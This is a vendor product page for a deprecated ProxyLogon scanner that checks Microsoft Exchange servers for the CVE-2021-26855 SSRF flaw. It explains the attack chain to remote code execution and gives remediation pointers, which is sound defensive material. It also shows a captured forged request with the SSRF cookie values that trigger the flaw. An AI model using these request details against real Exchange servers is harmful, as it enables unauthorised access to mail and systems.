Infrastructure Testing

ProxyLogon Scanner

Detect Microsoft Exchange servers vulnerable to Server-Side Request Forgery (CVE-2021-26855).

This tool is deprecated

This vulnerability scanner is now included into our Network Vulnerability Scan with OpenVAS.

Detect Microsoft Exchange servers vulnerable to Server-Side Request Forgery faster and discover if your systems are exposed to this critical security flaw.

Get findings in minutes and export a pentesting report focused on the vulnerability, including description, evidence, risk, and actionable recommendations for fixing it.

Reporting

Sample Report

Here is a ProxyLogon Scanner sample report that gives you a taste of how our tools save you time and reduce repetitive manual work.

  • Contains evidence for the discovered vulnerability (HTTP request and response)

  • Shows risk details and exploit information

  • Includes recommendations for fixing the issue

ProxyLogon Scanner Report Sample

How to use the pentesting tool

Use Cases for ProxyLogon Scanner

The tool can be used to check if the email server (Microsoft Exchange) is affected by CVE-2021-26855, a SSRF vulnerability which can lead to disclosure of sensitive information and to Remote Code Execution.

    Better vulnerability discovery. Faster pentest reporting.

    Get instant access to custom vulnerability scanners and automation features that simplify the pentesting process and produce valuable results. The platform helps you cover all the stages of an engagement, from information gathering to website scanning, network scanning, exploitation and reporting.

    Pentest-Tools.com ProxyLogon Scanner Sample Report

    ProxyLogon Scanner

    Technical Details

    CVE-2021-26855 is a Server-Side Request Forgery (SSRF) vulnerability in the Microsoft Exchange Server. An unauthenticated, remote attacker can use it to check if the Exchange service initiates HTTPS requests to arbitrary locations. These requests are done in the name of the Exchange service, so they are authenticated and include access tokens and other sensitive data.

    As a direct result, the malicious could forge requests to read emails of the users configured on that email server.

    A forged request includes interesting pieces of data like X-Sourcecafeserver, X-Commonaccesstoken, ClientId, etc. Here is how a full HTTP request initiated by the Exchange server looks like:

    Connection: Keep-Alive
    Cookie: X-AnonResource=true; X-AnonResource-Backend=pentest-tools.com/logger/etlWuwSzO8/ecp/default.flt?~1; X-BEResource=localhost; ClientId=9HWXKYJ0HUEBVKM0GMVIFW
    Host: pentest-tools.com
    X-Vdirobjectid: 3f80c757-01a3-4edc-b546-371ee214b8ed
    X-Commonaccesstoken: VgEAVAlBbm9ueW1vdXNDAEUAAAAA
    X-Sourcecafeserver: EXH01-1.AVDOC.LOCAL
    X-Isfromcafe: 1
    Msexchproxyuri: https://10.137.1.30/owa/auth/abcd.png
    X-Msexchangeactivityctx: V=1.0.0.0;Id=2310929a-3832-4ef5-851d-80927454aafa;C=;P=
    X-Originalrequesthostschemeport: 443:https:10.137.1.1
    X-Originalrequesthost: 10.137.1.30
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:60.0) Gecko/20110101 Firefox/60.0
    Accept: */*
    X-Excompid: ClientAccessFrontEnd
    X-Forwarded-Port: 47750
    X-Forwarded-For: 10.137.1.1
    Content-Length: 0
    

    When exploited together with another vulnerability, such as CVE-2021-27065 (post-authentication file write), this vulnerability can lead to unauthenticated Remote Code Execution on the Exchange server. This attack chain was named ProxyLogon.

    The ProxyLogon attack was massively used to exploit a large number of Microsoft Exchange servers exposed to the Internet by creating web shells in various locations on the file system.

    We recommend performing an in-depth review of vulnerable Exchange servers to check if they are exploited by malicious actors.

    Microsoft has released a tool to verify if there are new files present on the exchange server: https://github.com/microsoft/CSS-Exchange/tree/main/Security

    More details about this vulnerability:

    Parameters

    ParameterDescription
    TargetThis is the URL of the target Outlook Web Access (OWA) server.

    How it works

    The scanner attempts to trigger the SSRF vulnerability by determining the target Exchange server read a remote file located at: https://pentest-tools.com/file.txt

    If the file contents are found in the server's HTTP response, the target is declared vulnerable.

    Frequently Asked Questions for ProxyLogon Scanner

    If your question is not covered here, please check out our Support Center or contact us.

    Why are some tools deprecated on Pentest-Tools.com?

    Short answer: to keep the platform in top shape and keep it clutter-free!

    Long answer: we deprecate tools on Pentest-Tools.com after a detailed analysis from our dev team. If there’s a better way to use the tool’s functionality, we’ll always strive for integration and reliability.

    Most often, the decision to integrate a tool and its capabilities into a more complex one is to provide you with the option to get more complex and more detailed findings in a single scan.

    Looking to understand more about deprecated tools? This article in our Support Center is just what you need.

    Can I continue scanning with the deprecated tool?

    The ProxyLogon Scanner isn’t going anywhere, but you can no longer use it on its own. However, you can now check your systems for Microsoft Exchange servers vulnerable to Server-Side Request Forgery (CVE-2021-26855) with Network Vulnerability Scan with OpenVAS.

    Keep an eye on our changelog, blog, and on our LinkedIn page to be the first to know when we make new changes to the platform. Or you could just subscribe in the email form you can find at the bottom of this page.